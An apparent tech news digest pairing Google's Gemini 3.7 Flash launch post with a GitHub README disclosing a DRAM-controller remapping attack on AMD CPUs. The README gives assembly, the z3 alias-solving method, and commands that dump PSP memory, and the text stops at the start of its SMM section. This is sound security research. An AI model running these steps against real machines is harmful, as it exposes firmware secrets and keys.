Cover illustration

TheDaily Front

Issue No. #260813 Thursday, August 13 2026 #260813 — THURSDAY, AUGUST 13, 2026
Faster agents, older machines, and memory that refuses to mind its manners.
The Agents Get Faster, and the Machines Get Stranger
Thursday, August 13, 2026 The Daily Front No. #260813 — Contents
30stories
8,437points
5,096comments
300kllm tokens
Assembled with 31 model calls — 191,169 tokens read, 108,387 written.

Highlights

Gemini 3.7 Flash

Google’s latest Flash model puts coding agents and price-performance squarely at the center of the day’s model race.

Spaghettifying DRAM

A hardware researcher’s DRAM scrambling work turns protected memory regions into a disquieting map of hidden CPU territory.

Accelerating GPT-5.6 Sol Ultrafast

Cerebras-backed Ultrafast Mode promises a startling 750 output tokens per second for GPT-5.6 Sol.

Choose Boring Technology (2015)

A 45-year-old argument for dependable software returns as engineers debate where to spend their innovation tokens.

Happy 45th Birthday to the IBM PC and Model F/XT

The IBM PC anniversary and a browser revival of DONKEY.BAS offer a lively reminder of how personal computing began.

From the Editor

The speed merchants have arrived with fresh engines, faster harnesses, and the old question of whether anyone still understands the machinery. Elsewhere, a troublesome memory controller reminds us that the deepest layers of the stack have not grown any tamer. Keep one hand on the wheel, reader.

  1. Gemini 3.7 Flash3
  2. Spaghettifying DRAM4
  3. Accelerating GPT-5.6 Sol Ultrafast5
  4. DeepSeek Harness developer preview6
  5. Launch HN: Bullet (YC S26) – A Faster Coding Agent7
  6. Understanding is the new bottleneck8
  7. Choose Boring Technology (2015)9
  8. Choosing an AI model: one prompt, 11 models, different results10
  9. How Compaction Works in Pi11
  10. How Organizations Use AI: Evidence from ChatGPT [pdf]12
  11. AI At Home Part 1: A Box Of Scraps13
  12. Kubernetes on Oxide: How customer needs shaped our integrations14
  13. Flutter 3.4715
  14. Build Wide, Ship Narrow16
  15. I built a 500k-domain search engine for makers in a weekend for $1017
  16. Principia Mathematica is modern and insightful18
  17. Ordinary Abundance19
  18. Happy 45th Birthday to the IBM PC and Model F/XT20
  19. Come for ENIAC, Stay for UNIVAC and Skeduflo21
  20. Mushroom behind 'tiny people' hallucinations identified22
  21. Antiqua–Fraktur dispute23
  22. Gloomberb24
  23. Mistral OCR 4.125
  24. Donkey.bas is 45 Years Old – 131 line of Glory25
  25. Deutsche Bank becomes first foreign yuan clearing bank in Europe26
  26. Single log line is 49KB+ (ext4) / 110KB+ (btrfs) of systemd-journald disk writes27
  27. NP-overrated28
  28. Codex in ChatGPT desktop app for Linux is now in preview29
  29. uBlock Origin is giving up the fight to keep ads off Facebook29
  30. Nine PBS sues Iron Mountain over blocked access to archival data29
The Daily Front Page 2 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Flash Bulletin
article

Gemini 3.7 Flash

by thisisauserid·▲ 733 points·396 comments·blog.google ↗
Our most intelligent workhorse model yet for coding and agents.

Our most intelligent workhorse model yet for coding and agents.

Spark icon next to the text "Gemini 3.7 Flash", all on a light blue backgorund

Today, we’re building on the progress of our widely used Flash series by introducing Gemini 3.7 Flash, our most intelligent workhorse model yet for coding and agents.

This release comes just three weeks after Gemini 3.6 Flash, and is a direct result of developer feedback and algorithmic innovations that we look forward to bringing to future models. 3.7 Flash delivers substantial improvements across software engineering, knowledge work, and web development workflows — with an introductory price of half the original 3.6 Flash cost per million tokens.

Better intelligence for complex workflows

a chart showing production code quality

a chart showing long-horizon software engineering

a chart showing web development

a chart showing Expert PDF document comprehension

a chart showing enterprise workflow automation

3.7 Flash shows strong gains over 3.6 Flash in coding tasks like debugging and issue resolution. It also achieves higher first-pass code accuracy and has improved performance in generating production-ready code as seen in FrontierCode 1.1 Main (43.6% vs 34.4%) and DeepSWE v1.1 (65.3% vs 49.0%).

In web development, 3.7 Flash generates more functional layouts and feature-complete apps in fewer prompts. For UI generation, the model shows high design adherence and parity based on a reference input, whether it’s a screenshot, an image, or a full design system. It outperforms 3.6 Flash on Arena.ai’s WebDev Arena with an Elo score of 1588 vs 1538.

For knowledge-dense fields like finance, law, and biosciences, 3.7 Flash delivers improved reasoning and accuracy. It significantly outperforms 3.6 Flash on the GDP.pdf benchmark (34.0% vs 22.0%), an eval for testing a model’s ability to process complex documents. It also surpasses 3.6 Flash in AutomationBench, demonstrating it can more effectively complete real-world business workflows (30.4% vs 17.0%).

From a simple text prompt to a fully playable 3D game. We used Gemini 3.7 Flash combined with Nano Banana to dynamically generate characters, items, and textures in real-time.

Stunning, interactive landing pages generated in a single shot. We used Gemini 3.7 Flash to orchestrate sub-agents, using Gemini Omni to create smooth, interactive parallax components.

A robotics model getting trained with Gemini 3.7 Flash using multimodal understanding in a 3 agent graph loop that helps the robot learn faster.

From a static PDF to an interactive data story. Watch how complex annual reports are transformed into engaging web experiences complete with live charts and aggregated insights.

Better developer experience and price

Gemini 3.7 Flash delivers a noticeably improved developer experience over 3.6 Flash. It better adapts to roadblocks, clarifies intent when needed, and follows instructions with greater fidelity. It thinks more diligently, putting in more effort into multi-step planning and tool calls. A more disciplined execution means less manual oversight and fewer retries across engineering workflows.

3.7 Flash is available through the end of the year at an introductory price 1 of $0.75/1M input tokens and $3.75/1M output tokens. This price combined with the enhanced model performance enables developers and customers to scale production-ready agents cost effectively.

an image of a performance to cost comparison chart

Early customer feedback is highlighting 3.7 Flash’s performance and precision, achieving results that are significantly better than 3.6 Flash at a low cost.

Quote from Box

Quote from Browser Use

Quote from Cartwheel

quote from databricks

Quote from emergent

Quote from Harvey

Quote from Hebbia

Quote from LangChain

Quote from Nunu.ai

Quote from Open Code

Quote from Pydantic

Quote from Stanford Department of Biology

Improving Gemini Spark with 3.7 Flash

Gemini Spark, available to Google AI Pro and Ultra subscribers in over 160 countries, will be using Gemini 3.7 Flash starting today. We launched Spark at I/O as your personal AI agent that runs 24/7, taking action on your behalf while under your direction. This model update makes Spark more efficient for knowledge work with improved tool use for Google Workspace apps, delivering improved accuracy and output quality for complex, multi-skill workflows.

With 3.7 Flash, Gemini Spark can turn ideas into action more efficiently by consolidating files, drafting emails, and updating status documents.

Built with safety in mind

We continually work to improve the coverage and robustness of Frontier Safety safeguards. Gemini 3.7 Flash is shipping with updated safeguards against misuse in the domains of Chemical, Biological, Radiological, and Nuclear (CBRN) and cyber offense, while enabling beneficial use cases, in accordance with our approach to bioresilience and our cyber program.

For more information, see the 3.7 Flash model card.

Try it today

Detailed benchmarks

a chart displaying AI model benchmarks

1

Introductory pricing expires on December 31, 2026. Starting January 1, 2027, $1.50/1M input tokens and $7.50/1M output tokens will apply.

The Daily Front Page 3 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Memory’s Hidden Country
repository

Spaghettifying DRAM

by matt_d·▲ 552 points·151 comments·github.com ↗
★ 1,144⑂ 110 forks C

Unlocking _everything_ on the CPU with DRAM scrambling

Unlocking everything on the CPU with DRAM scrambling — PSP, C6, microcode, SMM, and anything else the specs left out.

&x == &x.

Usually.

Unspaghettifying DRAM

Poke the DRAM controller and an address can be made to land wherever you want in memory. skitter-creek-bath-salts modifies the bottom layers of the memory hierarchy to rewire the physical DRAM address translations. This scrambles platform memory, exposing protected regions of DRAM — carveouts invisible even to the kernel. When the address translations break, so do the security primitives built on them, and we unlock everything.


TL;DR


Target

Developed and tested on AMD Family 16h CPUs, the last generation whose datasheets document the DRAM controller's translation registers — and show that they can't be locked. 17h and beyond simply leave this information out. The odyssey of *p is similar across generations and architectures, and the underlying transforms extend even to ARM, RISC-V, and beyond; skitter-creek-bath-salts shows us only how to begin.


The odyssey of *p

It's a long way down.

Memory is built on layers of abstraction so deep they become almost absurd. When your code dereferences *p, it appears to access the DRAM at p. It does not — p is a virtual address, and before a single bit of DRAM is touched, it must survive the gauntlet below:

         ── CPU core / MMU ─────────────────────────────────────────────────
       ┌─ VA                                                  ← 64-bit virtual address from load/store
       │
       └> canonical-form check ──────────────────────┐        ← bits [63:48] sign-extend from bit 47
       ┌─ segment base add <─────────────────────────┘        ← FS.base / GS.base (MSR_FS_BASE, MSR_GS_BASE)
       │
       └> TLB probe ─────────────────────────────────┐        ← tagged by PCID (host) / VPID (guest)
              hit  → physical address k              │
              miss → engage hardware page walker     │
       ┌─ page walk (from CR3) <─────────────────────┘        ← walked only on TLB miss
       │      PML5[VA 56:48]                                  ← only if CR4.LA57
       │      PML4[VA 47:39]
       │      PDPT[VA 38:30]                                  ← 1 GiB leaf possible
       │      PD  [VA 29:21]                                  ← 2 MiB leaf possible
       │      PT  [VA 20:12]
       │      PTE                                             ← R/W · U/S · NX · A/D · PAT · PCD · PWT · G
       │
       └> per-level checks ──────────────────────────┐        ← evaluated at every level of the walk
              privilege (U/S)                        │        ← CPL vs PTE.U/S
              write    (R/W)                         │        ← + CR0.WP
              execute  (NX)                          │        ← EFER.NXE
              SMEP / SMAP                            │        ← CR4.SMEP · CR4.SMAP · EFLAGS.AC
              protection keys                        │        ← PKRU (user) · IA32_PKRS (supervisor)
       ┌─ A/D bit update <───────────────────────────┘        ← locked RMW on PTE
       │
       └> if guest: EPT / NPT re-walk ───────────────┐        ← each guest-PA above re-walked
              EPT-PML4 → EPT-PDPT → EPT-PD → EPT-PT  │        ← + EPT memory-type override
              ⇒ ~5× walks per single guest walk      │
       ┌─ TLB shootdown IPIs <───────────────────────┘        ← invlpg broadcast to peer vCPUs
       │
       │ ── IOMMU  (chipset / I/O fabric) ──────────────────────────────────
       │
       └> if device-initiated, IOMMU page walk ──────┐        ← VT-d / AMD-Vi: device-ID → domain → tables
                                                     │
       ┌──  **physical address k** <─────────────────┘
       │
       │ ── CPU core / MMU — memory-type resolution ────────────────────────
       │
       └> MTRR range match ──────────────────────────┐        ← IA32_MTRR_DEF_TYPE + fixed/variable MTRRs
       ┌─ PAT entry select <─────────────────────────┘        ← IA32_PAT[ PTE.PAT:PCD:PWT ]
       │
       └> effective memory type ─────────────────────┐        ← { WB, WT, WC, WP, UC-, UC }
                                                     │
         ── CPU uncore — caches & coherence ────────────────────────────────
                                                     │
       ┌─ L1-D probe <───────────────────────────────┘        ← VIPT, per-core
       │
       └> L2 probe ──────────────────────────────────┐        ← per-core / per-CCX
       ┌─ LLC probe + directory consult <────────────┘        ← shared, sliced
       │
       └> snoop / coherence ─────────────────────────┐        ← MESI / MOESI broadcast
              intra-socket                           │        ← broadcast to peer cores
              inter-socket                           │        ← QPI · UPI · Infinity Fabric · CXL.cache
              home-node directory response           │        ← data | intervention | abort
                                                     │
         ── system data fabric / interconnect ──────────────────────────────
                                                     │
       ┌─ if MMIO range or sub-4 GiB MMIO hole <─────┘        ← uncore/data fabric posted/non-posted txn
       │      → device BAR; done
       │
       └> else DRAM-bound: data fabric / mesh ───────┐        ← AMD DF · Intel mesh-or-ring uncore
                                                     │
  ┏━━      ── MCT / IMC (memory controller) ────────────────────────────────
W ┃    ┌─ DRAM hole remap <──────────────────────────┘        ← high-memory remap above TOM
E ┃    │
  ┃    └> memory-region exclusion remap ─────────────┐        ← reserved / protected ranges
  ┃    ┌─ channel interleave hash <──────────────────┘        ← XOR of selected PA bits → channel
A ┃    │
R ┃    └> rank interleave hash ──────────────────────┐        ← XOR of selected PA bits → rank
  ┃    ┌─ bank interleave hash <─────────────────────┘        ← XOR of selected PA bits → bank
  ┃    │
  ┃    └> bank swizzle / XOR scramble ───────────────┐        ← vendor- and BIOS-configurable
H ┃    ┌─ chip-select normalize (DCT) <──────────────┘        ← per-rank CS line
E ┃    │      rank → CS map
R ┃    │
E ┃    └> sub-channel select ────────────────────────┐        ← DDR5 / LPDDR5 only
  ┗━━                                                │
                                                     │
          DRAM coordinates <─────────────────────────┘        ← bank group · bank · row (RAS) · column (CAS)

This project works at the deepest levels of the *p pipeline, the MCT/DCT layer — where a physical address from the data fabric/interconnect enters the memory controller and is rewritten one final time into the raw DRAM coordinates that are issued to the DIMM.


Spaghettifying DRAM

Physical addresses are really more of a suggestion.

xor dword [0xf80c2094], 0x00400000

That's the exploit. All of it.

One bit-flip in the DRAM controller rewires the bottom of the *p pipeline, and the data that was at &x is now somewhere else mid-flight. Suddenly &x != &x. Every mechanism the CPU, firmware, uncore, and chipset use to wall off protected memory sits above the memory controller, and none of it sees what happens below. The fences guard physical addresses, not DRAM coordinates; rearrange the coordinates and the barriers above never notice.

But rewiring DRAM is easy. The bit above is the bank-swizzle-mode in the DCT, and it's just one of dozens that control the address remaps at the final layer — all you have to do is poke them to make everything built on top topple. The harder part then is keeping the platform up as the entirety of system memory is scrambled underneath it.

The trick: be fast, and don't touch DRAM. Disable the APs, prime the TLBs, warm the cache, disable interrupts, flush the target, serialize memory accesses, and hope the CPU prefetched the upcoming instructions. Then rewire the MCT/DCT to spaghettify DRAM, grab some data from the protected region, revert the mappings, serialize again, enable interrupts, resume the APs, and the platform is back to normal.

mov eax, [0xf80c2094]          ; prime mmio TLB
mov eax, [0x6f800000]          ; prime target TLB
pushf                          ; preserve flags
cli                            ; interrupts off
clflush [0x6f800000]           ; evict the target, force the dram read
mfence                         ; barrier - no coherent world dram access
lfence                         ;   reordered into spaghettified view
xor dword [0xf80c2094], 1<<22  ; flip dct swizzle → spaghettify dram
mov ebx, [0x6f800000]          ; fetch target in spaghettified view
xor dword [0xf80c2094], 1<<22  ; restore dct swizzle → unscramble
mfence                         ; barrier - no spaghettified dram access
lfence                         ;   reordered into coherent world view
popf                           ; interrupts back on

With some careful setup of paging, cache states, threading, and the TLBs, the address scrambling can be made to work from C, to illustrate the *p pipeline collapsing, and the platform's corrupted view when suddenly &x != &x:

&x manipulation

So we can rewire the map and restore it without a trace. All that's left is knowing what we rewired it into.


Unlocking everything

Every protected memory region on the platform, reachable with a calculator.

With the above approach, we can reprogram the MCT/DCT transform on a running system — rearranging the lowest stage of the *p pipeline to scramble memory out from underneath every protection built above it.

But there's a challenge: while we can reprogram the translation with a simple xor dword [0xf80c2094], 0x00400000, we have no idea what new transforms the MCT/DCT will use (the datasheets are underspecified here — the xor maps are off, the MMIO subtractive stage is unordered, and details vary across models). Without this, memory scrambles, but we have no way to reconstruct it.

Fortunately, the DRAM controller's address transform is a GF(2) linear map, which means we can reconstruct the scrambled memory with basic linear algebra.

First, consider the normal case: the forward transform of the default MCT/DCT configuration gets applied to some physical address, which lands on a secret in DRAM:

    ┌                                 ┐   ┌   ┐     ┌   ┐
    │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 │   │ 0 │     │ 1 │
    │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 1 │
    │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │   │ 0 │     │ 1 │
    │ 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 │ · │ 1 │  =  │ 1 │
    │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │   │ 0 │     │ 0 │
    └                                 ┘   └   ┘     └   ┘
                M_firmware               target     secret

This is the coherent view of memory: the lowest stage of the *p pipeline operates exactly as it should.

Now rewire the MCT/DCT stage of *p with xor dword [0xf80c2094], 0x00400000, and the platform enters a scrambled/spaghettified view of memory where a different transform allows an alias to reach the same DRAM secret:

    ┌                                 ┐   ┌   ┐     ┌   ┐
    │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 1 │
    │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 1 0 0 1 0 0 1 0 0 │   │ 1 │     │ 0 │
    │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 1 │
    │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 1 │
    │ 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 │ · │ 0 │  =  │ 1 │
    │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │   │ 0 │     │ 0 │
    └                                 ┘   └   ┘     └   ┘
                M_attacker                alias     secret

This alias lets us reach the same secret without hitting the existing platform locks and defenses built for the coherent view. To find the alias, compose the inverse of the attacking/spaghettified hash with the forward of the firmware/coherent hash, to get the translation that will reach any secret from the malicious MCT/DCT configuration:

    ┌                                 ┐   ┌                                 ┐   ┌   ┐     ┌   ┐
    │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 │   │ 0 │     │ 1 │
    │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 │   │ 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 1 │
    │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │   │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 1 │
    │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │   │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │   │ 0 │     │ 1 │
    │ 0 0 0 0 1 0 0 0 0 0 1 0 0 0 0 1 │ · │ 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 │ · │ 1 │  =  │ 0 │
    │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │   │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │   │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │   │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │   │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │   │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │   │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │   │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │   │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │   │ 0 │     │ 0 │
    └                                 ┘   └                                 ┘   └   ┘     └   ┘
               M_attacker⁻¹                              M_firmware             target    alias

The only challenge is that the matrices are unknown, which means we have no idea how memory is actually scrambled, and no transform to use to reach the secret in the first place:

    ┌                                 ┐   ┌                                 ┐   ┌   ┐     ┌   ┐
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 1 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ · │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │ · │ 1 │  =  │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 1 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? │   │ 0 │     │ ? │
    └                                 ┘   └                                 ┘   └   ┘     └   ┘
               M_attacker⁻¹                              M_firmware             target    alias

Fortunately, at this point it's just linear algebra, and you could solve the transforms by hand if you want. Or: a calculator.

We use z3. First, the SMT solver needs constraints to work with.

Start in the coherent view, modify the MCT/DCT to switch to the spaghettified view, drop some sentinel value like 0xdeadc0de into a random address in memory, flip back to the coherent view, and sweep memory for where the sentinel resurfaces. This gives a (target, alias) pair — a concrete datapoint showing two physical addresses that map to the same cell in DRAM. Repeat the process, gather a handful of data, pass it to z3, and it solves the translation matrix needed to convert between the two views — any coherent-view physical address on one side, its spaghettified-view alias on the other:

    ┌                                 ┐   ┌   ┐     ┌   ┐
    │ 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 │   │ 0 │     │ 1 │
    │ 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 │   │ 0 │     │ 1 │
    │ 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 1 │
    │ 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 │   │ 0 │     │ 1 │
    │ 0 0 0 0 1 0 0 0 0 0 1 0 0 0 0 1 │ · │ 1 │  =  │ 0 │
    │ 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 │   │ 1 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 │   │ 0 │     │ 0 │
    │ 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 │   │ 0 │     │ 0 │
    └                                 ┘   └   ┘     └   ┘
         M_attacker⁻¹ ∘ M_firmware        target    alias

Feeding alias pairs to z3 one at a time lets us watch the SMT solver decipher the memory scrambling in real time, as shown in the opening image.

The solved transform is a rosetta stone: any target address in the coherent view maps to an alias that reaches the same DRAM in the spaghettified view. To reach any protected memory, take an address we can't normally touch — PSP private memory, SMRAM, the C6 idle-state — and run it through the transform to get its alias. Then rewire the DCT with xor dword [0xf80c2094], 0x00400000, read or write the alias, and switch back with a second xor. The alias's path through the *p pipeline never hits a fence the platform built for the coherent view — unrestricted access to anything in DRAM.

unlocking DRAM

In the end, everything so carefully walled off — PSP private memory, SMRAM, the C6 idle-state, inaccessible from the OS, ring-0, sometimes the CPU itself — is still sitting in the same DRAM capacitors. But the locks were built around the coherent view of memory, and do nothing against a spaghettified alias reaching the same cell.

Flip one bit in the final level of the *p pipeline, and we've unlocked everything.


Quick start: unlock your Platform Security Processor

Tamper with your PSP, see what happens.

The fTPM runs on the PSP's own ARM core, in a DRAM carveout right past the visible top-of-memory. Reach it by aliasing an OS-visible physical address onto it, pull the bytes out, disassemble.

# Bail out early on platforms this was never tested on.
./userspace/platform_check || exit 1

# Resolve the PSP DRAM carveout — sets PSP_BASE / PSP_SIZE (0x7f800000 /
# 0x800000 on the test box). Swap 2x4gb for whichever data/maps/ prefix
# matches your DIMMs; one --map per saved map.
eval "$(sudo ./userspace/dram_carveouts --region psp)"
sudo ./userspace/dram_dump --protected-pa $PSP_BASE --length $PSP_SIZE \
    $(printf -- '--map %s ' data/maps/2x4gb_*.map) > psp.bin

# The PSP is an ARM core, so disassemble as Thumb-2. Carve crAmd_ModExp
# (0x64 bytes at PSP_BASE+0x19d4) straight out of the captured image.
objdump -b binary -m armv7 -M force-thumb --adjust-vma=$PSP_BASE \
    --start-address=$((PSP_BASE + 0x19d4)) \
    --stop-address=$((PSP_BASE + 0x19d4 + 0x64)) \
    -D psp.bin
; crAmd_ModExp — the fTPM's RSA modular-exponentiation routine, recovered intact
; from the PSP's private DRAM.
7f8019d4:  b5f0       push  {r4, r5, r6, r7, lr}
7f8019d6:  b0e5       sub   sp, #404
7f8019de:  2280       movs  r2, #128                  ; 1024-bit operand
7f8019e4:  f7fe ffef  bl    0x7f8009c6                ; import base (aA)
7f8019ee:  a0eb       adr   r0, 0x7f801d9c            ; "crAmd_ModExp aA failed, status = 0x%x"
7f8019f8:  f7fe ffe5  bl    0x7f8009c6                ; import exponent (aB)
7f801a02:  a0f0       adr   r0, 0x7f801dc4            ; "crAmd_ModExp aB failed status = 0x%x"
7f801a18:  f000 fdd4  bl    0x7f8025c4                ; the modexp itself
7f801a20:  a0f2       adr   r0, 0x7f801dec            ; "crAmd_ModExp failed ret=0x%08x, exit"
7f801a22:  f000 fef5  bl    0x7f802810                ; log error
7f801a2e:  f001 e92a  blx   0x7f802c84                ; export result
7f801a36:  bdf0       pop   {r4, r5, r6, r7, pc}

That's the PSP's RSA engine — the modexp behind every fTPM signature, and behind the Miller-Rabin tests that mint its keys — lifted out of memory the PSP is supposed to own alone, fenced off at the memory controller, opaque even to ring-0. Modify as you see fit.


Quick start: unlock System Management Mode

Read what SMM hides.

The SMI handler entry vector lives at SMBASE + 0x8000. SMBASE is in MSR 0xc0010111. Read it, pull the bytes through the alias map, and pipe them straight into a disassembler:

# Bail out early on platforms this was never tested on.
